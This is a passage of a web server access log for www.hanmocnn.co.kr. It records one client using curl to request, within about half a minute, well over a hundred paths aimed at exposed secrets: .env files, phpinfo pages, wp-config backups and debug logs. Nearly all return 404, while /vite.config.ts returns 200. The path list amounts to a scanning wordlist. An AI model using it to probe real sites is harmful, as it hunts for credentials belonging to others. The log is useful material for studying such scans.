192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/fixtures/app_types/node/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/fixtures/app_types/rails/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/fixtures/node_path/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/integration/env-config/app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:41 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test0.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test1.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test123.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:42 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test2.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test3.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test4.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test5.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:43 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test6.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test7.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test8.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test9.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:44 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_info1.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_info2.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_info3.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:45 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_info4.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_info5.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_phpinfo1.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:46 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_phpinfo2.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_phpinfo3.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_phpinfo4.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test_phpinfo5.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:47 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tester.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testfiles/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testing.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testing/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:48 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testing/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testing/docker/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Tests/Application/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v10.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v11.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v12.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v13.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:50 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v7.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v8.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/default_settings/v9.0/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/drupal-test/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:51 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/Integration/Environment/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tests/todo-react/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/testwork_json/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/theme/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:52 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/theme_static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/thumb/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/thumbs/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tiedostot/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:53 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/time.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tmp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tmp/config/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tmp/logs" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:54 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/token.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tool/view/phpinfo.view.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tools/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Travel_form/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:55 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ts/prime/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/tz.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/u.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ubuntu/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/ui/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/unixtime/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/unsplash-downloader/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/up.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/upfiles/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/upload/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/uploads/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/urlmem-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/user/.env.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/user/login" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/User_info/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/v1/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/v1/admin/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/v1/debug/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/v1/private/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/v2/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/var/backup/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/github.com/gobuffalo/envy/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendor/github.com/subosito/gotenv/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vendors~main.f286c0f60bdc707d91a8.bundle.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vercel.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/videos/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/vite.config.ts" [Client 185.177.72.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vm-docker-compose/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vod_installer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vue-end/vue-til/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vue/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vue/vuecli/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/vue_CRM/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/w.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web-dist/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web.config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web/debug/default/view" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Web/siteMariage/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/webpack-stats.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/webpack.config.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/webroot_path/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/website/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/websocket/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/webstatic/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/webui/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/well-known/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/whturk/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/windows/tests/9.2.x/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/windows/tests/9.3.x/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wordpress/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/workspace/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.old" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php-backup" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-login.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-login/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wpp-config.php~" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/www-data/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/x.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/xx-final/vue-heroes/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/yarn.lock" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/zmusic-frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/:443/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/:80/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/:8080/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/:8081/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/:8443/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid_email/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:15:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr 